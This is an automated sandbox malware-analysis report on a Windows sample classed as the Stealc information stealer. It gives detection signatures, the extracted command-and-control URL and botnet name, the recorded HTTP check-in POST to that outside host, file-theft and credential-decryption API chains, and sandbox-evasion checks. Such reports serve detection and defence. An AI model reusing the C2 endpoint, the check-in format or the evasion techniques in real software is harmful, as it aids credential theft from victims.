Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1531486
MD5: 1d5102a006a1f46ae6d349ca54497fc3
SHA1: 9d2909785110f5795d032f46680c4fc173b38740
SHA256: aa9447ab2cb7ff4768b9782a6d5a79a71627b2d7c25ca662cd5614128eda50fe
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4132 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D5102A006A1F46AE6D349CA54497FC3)
  • cleanup

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara matches (Source | Rule | Description | Author)
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4132 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4132 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.e20000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-10-11T09:45:27.583709+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.e20000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpr | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpL | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpM | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpe | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpy | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpA | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 53%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00E2C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00E29AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E27240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00E27240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00E29B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E38EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00E38EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00E338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E34910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E34910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E2DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E2E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E34570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00E34570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E2ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E216D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E33EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00E33EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E2F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E2BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E2DE10

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 46 39 46 46 39 32 37 42 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAK Content-Disposition: form-data; name="hwid" A5F9FF927BF51660493485 ------GDAAKFIDGIEGDGDHIDAK Content-Disposition: form-data; name="build" doma ------GDAAKFIDGIEGDGDHIDAK--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00E24880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 46 39 46 46 39 32 37 42 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAK Content-Disposition: form-data; name="hwid" A5F9FF927BF51660493485 ------GDAAKFIDGIEGDGDHIDAK Content-Disposition: form-data; name="build" doma ------GDAAKFIDGIEGDGDHIDAK--
Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2190392041.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190392041.0000000001992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
Source: file.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37V

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 0_2_011D8135
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 0_2_011EA012
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F1844 0_2_010F1844
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E50BE 0_2_011E50BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010AE317 0_2_010AE317
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E6B7C 0_2_011E6B7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EBB9D 0_2_011EBB9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F4BA2 0_2_011F4BA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EF22E 0_2_011EF22E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E1AB9 0_2_011E1AB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E3526 0_2_011E3526
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B0D60 0_2_011B0D60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01107D82 0_2_01107D82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F0D8A 0_2_011F0D8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E85B7 0_2_011E85B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DF5A2 0_2_010DF5A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A342D 0_2_012A342D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0121C4AE 0_2_0121C4AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0113EF2C 0_2_0113EF2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01130E46 0_2_01130E46
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: lkjltntr ZLIB complexity 0.9950160824781165
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E38680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00E38680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E33720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00E33720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\VFFLBM5O.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 53%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1852416 > 1048576
Source: file.exe | Static PE information: Raw size of lkjltntr is bigger than: 0x100000 < 0x19e200

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.e20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lkjltntr:EW;uktbgiwd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lkjltntr:EW;uktbgiwd:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E39860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c9e7d should be: 0x1d04c2
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: lkjltntr
Source: file.exe | Static PE information: section name: uktbgiwd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01297924 push 37438520h; mov dword ptr [esp], eax 0_2_01297945
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01297924 push 7D4ADEC7h; mov dword ptr [esp], eax 0_2_01297973
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01297924 push ecx; mov dword ptr [esp], esi 0_2_01297989
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push ebp; mov dword ptr [esp], esi 0_2_011D813F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push 18248B3Bh; mov dword ptr [esp], edx 0_2_011D81D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push edi; mov dword ptr [esp], ebp 0_2_011D81E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push edi; mov dword ptr [esp], 5E31782Bh 0_2_011D8262
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push edx; mov dword ptr [esp], eax 0_2_011D82DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push ecx; mov dword ptr [esp], ebx 0_2_011D82F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D8135 push esi; mov dword ptr [esp], ecx 0_2_011D8352
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01257113 push 5D95D018h; mov dword ptr [esp], esi 0_2_012571FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01310107 push edx; mov dword ptr [esp], 0E968DD6h 0_2_0131017C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A4116 push 577F224Fh; mov dword ptr [esp], ecx 0_2_012A413C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128116B push 08472276h; mov dword ptr [esp], ecx 0_2_0128118F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0125F171 push esi; mov dword ptr [esp], ebp 0_2_0125F21C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0125C171 push edx; mov dword ptr [esp], ebx 0_2_0125C1C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01280944 push edx; mov dword ptr [esp], ebx 0_2_01280994
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01213953 push eax; mov dword ptr [esp], ecx 0_2_01213964
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012651E2 push eax; mov dword ptr [esp], esi 0_2_01265210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012651E2 push 7431BF53h; mov dword ptr [esp], esi 0_2_012652A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130E9E0 push 7F6EF196h; mov dword ptr [esp], edx 0_2_0130E9EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3B035 push ecx; ret 0_2_00E3B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push 42107803h; mov dword ptr [esp], ebx 0_2_011EA020
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push edi; mov dword ptr [esp], ecx 0_2_011EA0B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push eax; mov dword ptr [esp], ebp 0_2_011EA0C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push esi; mov dword ptr [esp], edx 0_2_011EA117
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push 0B307AAFh; mov dword ptr [esp], edx 0_2_011EA17E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push ebx; mov dword ptr [esp], ecx 0_2_011EA225
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push ebx; mov dword ptr [esp], edx 0_2_011EA25E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push 79D5F791h; mov dword ptr [esp], ebp 0_2_011EA298
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA012 push ebx; mov dword ptr [esp], edx 0_2_011EA2E5
Source: file.exe | Static PE information: section name: lkjltntr entropy: 7.9546951511511

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E39860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13558
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1081E3A second address: 1081E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1081E3E second address: 1081E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F8673 second address: 11F867E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F867E second address: 11F868E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBB68 second address: 11FBC0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 12E99FC2h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007EFEB92DE1E8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a stc 0x0000002b mov edi, 6966E453h 0x00000030 add ch, FFFFFF95h 0x00000033 push 00000003h 0x00000035 jmp 00007EFEB92DE1F4h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007EFEB92DE1E8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2D0Eh], eax 0x0000005c push 00000003h 0x0000005e mov di, ax 0x00000061 push 7D46B821h 0x00000066 push eax 0x00000067 push edx 0x00000068 js 00007EFEB92DE1FFh 0x0000006e jmp 00007EFEB92DE1F9h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBC0E second address: 11FBC47 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 42B947DFh 0x00000011 push esi 0x00000012 pushad 0x00000013 mov ax, bx 0x00000016 popad 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1244D988h] 0x0000001e mov edx, dword ptr [ebp+122D281Eh] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007EFEB91CA54Ch 0x0000002d jno 00007EFEB91CA546h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBC47 second address: 11FBC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
